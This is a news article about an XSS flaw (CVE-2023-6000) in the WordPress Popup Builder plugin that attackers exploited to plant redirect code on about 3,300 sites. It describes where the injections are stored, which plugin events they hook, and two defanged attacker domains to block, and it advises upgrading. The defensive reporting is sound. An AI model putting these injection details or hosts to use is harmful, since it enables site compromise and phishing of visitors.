WordPress Plugin Flaw: Hackers Infected 3,300 Sites With Malware

Hackers are not wasting any time these days, and they just hopped on WordPress to attack 3,300 sites with malware. Here are the latest reports on the matter.

WordPress plugin flaw exploited

According to new reports, it seems that hackers managed to breach WordPress sites via an exploitation of a vulnerability in the outdated versions of the Popup Builder plugin. The result has been 3,300 websites that were infected with malicious code.

A cross-site scripting (XSS) vulnerability tracked as CVE-2023-6000 was exploited in the attacks. It affects Popup Builder versions 4.2.3 and older, and was disclosed in November 2023.

Bleeping Computer notes that a Balada Injector campaign uncovered at the start of this year exploited the particular vulnerability to infect over 6,700 websites. The fact shows that there were a lot of site admins who hadn’t patched quickly enough.

According to the same notes, Sucuri reported spotting a brand new campaign that hosted an important uptick in the past three weeks.

The target was the very same vulnerability on the WordPress plugin.

As noted by the PublicWWW results, “code injections linked to this latest campaign are to be found in 3,329 WordPress sites, with Sucuri’s own scanners detecting 1,170 infections.”

Malicious code is injected into the Custom JavaScript or Custom CSS sections of the WordPress admin interface and stored within the ‘wp_postmeta’ database table.

It is also important to note the fact that the main function of the injected code is to act as event handlers for various Popup Builder plugin events, such as ‘sgpb-ShouldOpen’, ‘sgpb-ShouldClose’, ‘sgpb-WillOpen’, ‘sgpbDidOpen’, ‘sgpbWillClose’, and ‘sgpb-DidClose.’

After this move, the malicious code executes at specific actions of the plugin. An example would be the moment when a popup opens or closes.

Sucuri has stated that the injections’ primary purpose seems to redirect visitors of infected sites to malicious destinations, such as phishing pages and malware-dropping sites. However, the exact actions of the code may vary.

Bleeping Computer stated that such attacks come from the domains “ttincoming.traveltraffic[.]cc” and “host.cloudsonicwave[.]com,” and this means the fact that blocking these two is recommended.

If you’re using the Popup Builder plugin on your site, upgrade to the latest version, currently 4.2.7, which addresses CVE-2023-6000 and other security problems.

“WordPress stats show that at least 80,000 active sites currently use Popup Builder 4.1 and older, so the attack surface remains significant,” according to the online publication mentioned above.

As a lot of individuals are using WordPress, the matter holds a massive importance and should be addressed as quickly as possible.

Rada Mateescu
I'm hungry for truth, thirsty to learn, and eager to share. At Optic Flux, my goal is to deliver breaking juicy health, financial, and tech/science-related content. I focus on all that's meaningful and impactful for my readers.